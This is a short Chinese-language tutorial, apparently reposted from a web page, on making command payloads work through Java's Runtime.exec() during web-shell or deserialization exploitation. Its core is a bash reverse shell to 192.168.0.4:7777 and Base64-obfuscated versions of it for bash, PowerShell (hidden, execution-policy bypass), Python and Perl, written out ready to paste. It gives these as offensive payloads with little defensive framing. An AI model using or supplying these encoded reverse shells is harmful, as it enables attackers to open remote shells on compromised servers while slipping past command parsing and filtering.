有時，通過Runtime.getRuntime().exec()執行命令的有效負載有時會失敗。使用Web Shell，反序列化利用或通過其他媒介時，可能會發生這種情況。

有時這是因為重定向和管道字元的使用在啟動過程的上下文中沒有意義。例如，在shell中執行ls> dir_listing會將當前目錄的列表輸出到名為dir_listing的檔案中。但是在exec()函式的上下文中，該命令將被解釋為獲取>和dir_listing目錄的列表。

有時，StringTokenizer類會破壞其中包含空格的引數，該類將命令字串按空格分隔。像ls“我的目錄”之類的東西將被解釋為ls“我的目錄”。

藉助Base64編碼，下面的轉換器可以幫助減少這些問題。它可以通過呼叫Bash或PowerShell來製作管道並重新定向，還可以確保引數內沒有空格。

樣例：

原文

bash -i >& /dev/tcp/192.168.0.4/7777 0>&1

編碼後：

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}
#bash

powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YgBhAHMAaAAgAC0AaQAgAD4AJgAgAC8AZABlAHYALwB0AGMAcAAvADEAOQAyAC4AMQA2ADgALgAwAC4ANAAvADcANwA3ADcAIAAwAD4AJgAxAA==
#powershell

python -c exec('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE='.decode('base64'))
#python

perl -MMIME::Base64 -e eval(decode_base64('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE='))
#perl

中間的字元均為“base64”編碼。

知識點擴充套件：

java.lang.Runtime.getRuntime().exec(cmd)命令中引數不能用空格怎麼辦？

專案中無法執行c程式，猜測是exec()函式的問題

String cmd= exe_path + " " +video + " " +host + ":" + port;
Process process = runtime.exec(cmd);

到此這篇關於java.lang.Runtime.exec() Payload知識點詳解的文章就介紹到這了,更多相關java.lang.Runtime.exec() Payload內容請搜尋我們以前的文章或繼續瀏覽下面的相關文章希望大家以後多多支援我們！